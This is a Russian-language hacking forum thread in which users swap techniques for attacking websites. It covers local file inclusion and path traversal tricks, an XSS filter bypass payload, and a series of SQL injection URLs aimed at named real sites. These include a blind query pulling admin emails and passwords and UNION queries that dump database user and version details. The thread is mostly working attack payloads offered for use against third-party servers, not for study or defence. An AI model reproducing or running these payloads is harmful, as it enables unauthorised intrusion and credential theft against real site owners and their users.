На счёт доступа к БД через локальный инклуд, я хз, ниразу не слышал... А вот почитать файлы на сервере можно, остаётся узнать, на сколько дирикторий ниже находится нужный нам файл. Вместо символа "<"(0x3C) используй "."(0x2E) для того, чтобы иметь возможность выйти из текущей директории.
во первых сервер виндовый о чем явственно гласит надпись "in Y:\home\78.110.144.12\www\index.php" значит никакого /etc/passwd во-вторых замена нулл-байта для винды - 255 точек(если пямять не изменяет) upd: 266 ,пардон ,точек. более универсальная весч.
Помогите обойти фильтр! Не выводится алерт! [im*g]http://www.qwewqw.ru/1.jpg%20dynsrc=javascript:alert()[/im*g]
Code: <img src="http://www.qwewqw.ru/1.jpg"%20dynsrc="javascript:alert()" alt="Изображение" />
зачем тебе это а там ведь инклуда. инклуду уже во многих саитах зашешают только не опотныие програмисты могут сделать такое. помоему ты хочеш узнать что можно сделать с таким ошибкой я тоже хотел бы узнать что можно сделать если наити на саитах такие инклуд ошибки и к чему они приведут если оно попоидет в руку хакера
Code: http://www.ncrtp-hepc.ca/profiles.php?id=70 SQL-Inj. Help... geforce, не пиши красным =\ Code: http://www.google.com/search?client=opera&rls=en&q=site:forum.antichat.ru+wow.alania.net
2mailbrush Там одно поле: Code: http://www.ncrtp-hepc.ca/profiles.php?id=70+order+by+1--+ И четвёртая ветка: Code: http://www.ncrtp-hepc.ca/profiles.php?id=70+and+substring(version(),1,1)=4-- Но вывода скорее всего нету, но это не ознаает, что его и не будет, гдето здесь присалось об этом: Если ничего не выйдет, то работай подзапросами!
http://www.ncrtp-hepc.ca/profiles.php?id=70+and+ascii(substring((select+concat_ws(0x2F,email,pwd)+from+admin+limit+0,1),1,1))>1
Там только одно поле и нету вывода. Заюзай эту лучше: http://www.ncrtp-hepc.ca/profiles.php?type=-3+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7/* ps: Тут еще прикольный листинг директорий есть, может пригодится: http://www.ncrtp-hepc.ca/photos.php?album=../
2 crazy~driver Не посмотришь, т.к. php интерпретируется на стороне сервера, независимо от включенного\выключенного листинга директорий
Code: http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=217+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null PostgreSQL - первый раз с такой стыкаюсь. Почитал статтейку, вроде понял, но не пашет (не выводится).